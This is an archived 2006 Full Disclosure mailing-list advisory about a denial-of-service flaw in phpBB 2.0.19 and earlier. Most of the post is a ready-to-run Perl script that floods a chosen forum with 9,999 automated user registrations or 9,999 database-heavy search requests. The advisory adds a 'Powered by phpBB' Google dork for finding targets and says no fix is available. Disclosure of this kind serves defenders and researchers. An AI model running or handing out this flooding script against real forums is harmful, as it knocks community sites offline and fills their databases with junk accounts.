Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability
From: h4cky0u <h4cky0u.org () gmail com>
Date: Wed, 25 Jan 2006 20:13:45 +0530

------------------------------------------------------
      HYSA-2006-001 h4cky0u.org Advisory 010
------------------------------------------------------
Date - Wed Jan 25 2006


TITLE:
======

phpBB 2.0.19 search.php and profile.php DOS Vulnerability


SEVERITY:
=========

High


SOFTWARE:
=========

phpBB 2.0.19 and prior


INFO:
=====

phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

Support Website : http://www.phpbb.com


BUG DESCRIPTION:
================

The bug was originally found by HaCkZaTaN of NeoSecurityteam. The
original exploit code can be found at -

http://h4cky0u.org/viewtopic.php?t=637

This one affected only versions uptill phpBB 2.0.15. The exploit code
has been recoded which affects the latest version too. The bug resides
in the following two scripts-

profile.php << By registering as many users as you can.
search.php  << By searching in a way that the db cannot understand.


Proof Of Concept Code:
======================

#!/usr/bin/perl
#######################################
##   Recoded by: mix2mix and Elioni of http://ahg-khf.org
##   And h4cky0u Security Forums (http://h4cky0u.org)
##   Name: phpBBDoSReloaded
##   Original Author: HaCkZaTaN of Neo Security Team
##   Tested on phpBB 2.0.19 and earlier versions
##   Ported to perl by g30rg3_x
##   Date: 25/01/06
#######################################
use IO::Socket;

## Initialized X
$x = 0;

print q(
  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
  Recoded by Albanian Hackers Group &
  h4cky0u Security Forums       

);
print q(Host |without-> http://www.| );
$host = <STDIN>;
chop ($host);

print q(Path |example-> /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);

print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If
Visual Confirmation is enabled| );
$type = <STDIN>;
chop ($type);

## Tipi për regjistrim
if($type == 1){

## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{

## Antari që regjistrohet automatikishtë "X"
$uname = "username=AHG__" . "$x";

## Emaili që regjistrohet ne bazën "X"
$umail = "&email=AHG__" . "$x";

$postit = 
"$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

$lrg = length $postit;

my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk
egziston: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "+" for every loop
syswrite STDOUT, "+";

$x++;
}

## Tipi 2-shë për Kërkim(Flood)
}
elsif ($type == 2){

while($x != 9999)
{
## Final Search String to Send
$postit = 
"search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nThe Socket Can't Connect To The Desired Host or the Host is
MayBe DoSed: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Send A BD Search Into
phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "+" for every loop
syswrite STDOUT, "+";

## Increment X in One for every Loop
$x++;
}
}else{
## STF??? Qfarë keni Shtypur
   die "Mundësia nuk Lejohet +_-???\n";
}


FIX:
====

No fix available as of date.


GOOGLEDORK:
===========

"Powered by phpBB"


CREDITS:
========

- This vulnerability was discovered and researched by HaCkZaTaN of
NeoSecurityteam.


- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest
release of the script -

Web : http://ahg-khf.org

mail : webmaster at ahg-khf dot org


- Co Researcher -

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail dot com

web : http://www.h4cky0u.org


ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt

--
http://www.h4cky0u.org
(In)Security at its best...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability h4cky0u (Jan 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]